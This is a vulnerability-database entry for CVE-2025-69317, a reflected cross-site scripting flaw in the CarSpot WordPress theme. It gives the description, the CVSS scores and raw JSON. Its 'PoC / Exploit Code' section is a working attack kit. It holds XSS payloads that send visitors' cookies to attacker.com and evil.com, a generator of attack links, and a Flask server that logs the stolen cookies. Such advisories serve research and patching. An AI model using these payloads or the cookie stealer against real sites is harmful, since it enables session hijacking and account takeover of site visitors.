Security Vulnerability Report
中文
CVE-2025-69317 CVSS 7.1 HIGH

CVE-2025-69317

Published: 2026-01-22 17:16:27
Last Modified: 2026-04-27 21:16:24

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle CarSpot carspot allows Reflected XSS.This issue affects CarSpot: from n/a through < 2.4.6.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CarSpot < 2.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69317 CarSpot Reflected XSS PoC --> <!-- Target: WordPress sites using CarSpot theme < 2.4.6 --> <!-- Attack Type: Reflected XSS --> <!DOCTYPE html> <html> <head> <title>CVE-2025-69317 PoC</title> </head> <body> <h2>CVE-2025-69317 - CarSpot Theme Reflected XSS</h2> <h3>Malicious URL (Social Engineering Required):</h3> <p id="malicious-url"></p> <h3>Attack Payloads:</h3> <ul> <li><strong>Basic Alert:</strong> ?search=<script>alert('XSS')</script></li> <li><strong>Cookie Theft:</strong> ?search=<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"></li> <li><strong>Session Hijack:</strong> ?keyword=<script>document.location='https://attacker.com/log?cookie='+document.cookie</script></li> <li><strong>DOM Manipulation:</strong> ?cat_id=<svg/onload=alert(document.domain)></li> </ul> <h3>Generated Attack URLs:</h3> <script> const baseUrl = window.location.origin + '/wp-content/themes/carspot/...'; const payloads = [ "<script>alert('CVE-2025-69317 XSS')</script>", "<img src=x onerror=fetch('https://evil.com/log?c='+document.cookie)>", "<svg/onload=alert(document.domain)>", "<iframe src="javascript:alert('XSS')">" ]; payloads.forEach((payload, i) => { document.write(`<p>Payload ${i+1}: <a href="${baseUrl}?s=${encodeURIComponent(payload)}" target="_blank">Test Link ${i+1}</a></p>`); }); </script> <h3>Cookie Stealer (attacker-controlled server):</h3> <pre> # Python server to receive stolen cookies from flask import Flask, request import logging app = Flask(__name__) logging.basicConfig(filename='stolen_cookies.log') @app.route('/steal') def steal(): cookie = request.args.get('c') logging.info(f'Stolen cookie: {cookie}') return 'OK' if __name__ == '__main__': app.run(host='0.0.0.0', port=443) </pre> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69317", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:27.463", "lastModified": "2026-04-27T21:16:23.907", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle CarSpot carspot allows Reflected XSS.This issue affects CarSpot: from n/a through < 2.4.6."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en scriptsbundle CarSpot carspot permite XSS Reflejado. Este problema afecta a CarSpot: desde n/d hasta &lt; 2.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/carspot/vulnerability/wordpress-carspot-theme-2-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}